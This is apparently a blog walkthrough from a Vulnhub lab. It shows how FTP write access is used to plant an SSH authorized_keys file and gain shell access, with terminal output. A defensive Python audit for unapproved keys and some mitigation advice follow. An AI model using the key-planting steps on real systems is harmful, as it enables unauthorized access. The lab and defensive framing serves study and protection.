Steps for Obtaining a Shell on the Target Machine via FTP

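Once an FTP username and password have been obtained, and that user has permission to upload files and create files, the steps for obtaining a shell from there are as follows: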

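1. On Kali Linux, use the ssh-keygen command to create the public and private key files, and move these files to the working directory so that they can be uploaded over FTP later.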

    ┌──(root💀kali)-[~/Vulnhub/chanakya]
    └─# ssh-keygen
    Generating public/private rsa key pair.
    Enter file in which to save the key (/root/.ssh/id_rsa):
    Enter passphrase (empty for no passphrase):
    Enter same passphrase again:
    Your identification has been saved in /root/.ssh/id_rsa
    Your public key has been saved in /root/.ssh/id_rsa.pub
    The key fingerprint is:
    SHA256:o3qqxP2XtfrtTqjSSy4k1Ikh5+xRym+dW4MT2aWLHqo root@kali
    The key's randomart image is:
    +---[RSA 3072]----+
    |                 |
    |  . o .     .    |
    |   * * . o o     |
    |    O o o o      |
    |   o o .S= .     |
    | . .o +.B.=.     |
    |  o .+.+.B.o.    |
    | .   o=o*..o     |
    |  ..E+.+=+.o+    |
    +----[SHA256]-----+

    ┌──(root💀kali)-[~/Vulnhub/chanakya]
    └─# ls -alh
    total 120K
    drwxr-xr-x 2 root root 4.0K Feb 12 23:09 .
    drwxr-xr-x 9 root root 4.0K Feb 12 22:35 ..
    -rw-r--r-- 1 root root 100K Feb 12 23:04 ashoka.pcapng
    -rw-r--r-- 1 root root    1 Feb 12 23:08 .bash_history
    -rw-r--r-- 1 root root 1.2K Feb 12 22:38 nmap_full_scan
    -rw-r--r-- 1 root root   12 Feb 12 23:09 test.txt

2. Redirect the contents of the id_rsa.pub public key file into a file named authorized_keys.

    cat id_rsa.pub > authorized_keys

3. In the user's home directory on the target machine, create a .ssh directory and change into it.

4. Upload the authorized_keys file to the .ssh directory.

    ftp> mkdir .ssh
    257 "/.ssh" directory created.
    ftp> cd .ssh
    250 "/.ssh" is the current directory.
    ftp> put authorized_keys
    local: authorized_keys remote: authorized_keys
    200 Active data connection established.
    125 Data connection already open. Transfer starting.
    226 Transfer complete.
    563 bytes sent in 0.00 secs (8.3894 MB/s)
    ftp>

5. Change the permissions of the id_rsa file to 400, then ssh to the target host.
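
Seen from the defending side, this procedure leaves an authorized_keys file that the account owner never approved inside a directory the FTP user can write to. The audit below is an added example, not part of the original post: it walks an FTP-exposed tree, fingerprints every key in each .ssh/authorized_keys file, and reports keys that are missing from an allowlist. The tree layout, the allowlist and the sample keys in demo() are constructed assumptions.

```python
import base64
import hashlib
import os
import tempfile


def fingerprint(key_b64):
    """OpenSSH-style fingerprint: unpadded base64 of SHA-256 over the decoded key blob."""
    digest = hashlib.sha256(base64.b64decode(key_b64, validate=True)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_keys(text):
    """Yield (key_type, fingerprint, comment) per key line; options before the type are skipped."""
    for line in text.splitlines():
        fields = line.split()
        idx = next((i for i, f in enumerate(fields[:-1])
                    if f.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or fields[0].startswith("#"):
            continue
        try:
            yield fields[idx], fingerprint(fields[idx + 1]), " ".join(fields[idx + 2:])
        except ValueError:  # blob is not valid base64: report it rather than skip it
            yield fields[idx], "UNPARSEABLE", line


def audit(root, allowed):
    """Return sorted (path, key_type, fingerprint, comment) for keys not on the allowlist."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if os.path.basename(dirpath) == ".ssh" and "authorized_keys" in files:
            path = os.path.join(dirpath, "authorized_keys")
            with open(path, errors="replace") as fh:
                for ktype, fp, comment in parse_keys(fh.read()):
                    if fp not in allowed:
                        findings.append((path, ktype, fp, comment))
    return sorted(findings)


def demo():
    """Constructed sample tree: one allowlisted key and one key that was never approved."""
    known = base64.b64encode(b"constructed-blob-admin").decode()
    extra = base64.b64encode(b"constructed-blob-unknown").decode()
    with tempfile.TemporaryDirectory() as tmp:
        ssh_dir = os.path.join(tmp, "ftpuser", ".ssh")
        os.makedirs(ssh_dir)
        with open(os.path.join(ssh_dir, "authorized_keys"), "w") as fh:
            fh.write(f"ssh-ed25519 {known} admin@ops\nssh-rsa {extra} root@kali\n")
        return audit(tmp, {fingerprint(known)})
```

The procedure stops working when FTP users cannot write inside the home directory that sshd reads keys from, for example by giving FTP a separate root or by pointing sshd's AuthorizedKeysFile at a root-owned location.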


posted @ 2023-02-13 13:39  Jason_huawen